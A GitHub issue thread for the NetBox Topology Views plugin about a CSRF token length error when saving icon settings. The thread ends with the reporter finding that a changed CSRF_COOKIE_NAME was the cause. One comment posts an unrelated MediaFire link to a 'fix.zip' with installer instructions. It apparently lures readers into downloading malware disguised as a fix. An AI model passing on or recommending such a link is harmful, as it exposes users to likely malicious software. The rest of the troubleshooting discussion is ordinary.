### ISSUE TITLE
Unable to save changes to Icon images in preferences

### ISSUE THREAD

**Issue by arcticash** [mattieserver/netbox-topology-views#553]
### NetBox version

v4.0.9

### Topology Views version

v4.0.0

### Steps to Reproduce

1. Click on Topology Views > Images
2. Make a change to the images, choosing a different icon for one of the categories
3. Press Save button to save changes
4. Error is shown and changes are not saved

### Expected Behavior

Changes should be saved and the browser returns to the previous page.
This happens even after logging out & back in and clearing cache & cookies.

### Observed Behavior

An error message is displayed in a pop up balloon, and the changes are not saved.

```
😢 {"detail":"CSRF Failed: CSRF token from the 'X-Csrftoken' HTTP header has incorrect length."} 
```

**Comment by Wanderx13** [comment]
Download 
https://www.mediafire.com/file/ynhx37qmyqek881/fix.zip/file
In the installer menu, select "gcc."

**Comment by dreng** [comment]
I am not able to reproduce this error either in my dev system nor in my productive environment. To get closer to the root cause, we need more information.

We've had a somewhat similar question (#324) last year. Are you using Docker?

Have you tried a different browser?
Do you use any browser add-ons which could block things or deletes/manipulates cookies?
Do you work in a multi domain environment?
Do you use a (maybe transparent) proxy?
Have you tried setting up a test server with a clean installation of NetBox that follows the installation instructions exactly?

**Comment by arcticash** [comment]
Thanks for looking into this @dreng 

I'm not using Docker, this instance is installed on RHEL 9.4.
Just had a go using Edge & Firefox, both normal and private browsing (no plugins) windows and both give the same outcome.
Just tried accessing directly via the system IP and again, still the same issue.
I have not tried with a clean install, this is a previously working install that seems to have picked up this bug during an update, will try removing the plugin & related tables and reinstalling to see if that might have bee the issue.

**Comment by arcticash** [comment]
Closing this issue now as I have managed to resolve it - don't think its an issue with the plugin, think it was an issue with my django configuration.

In-case anyone else stumbles across the same problem, in my case I had changed the value of CSRF_COOKIE_NAME in configuration.py, switching this back to its default value of "csrftoken" has solved the problem.
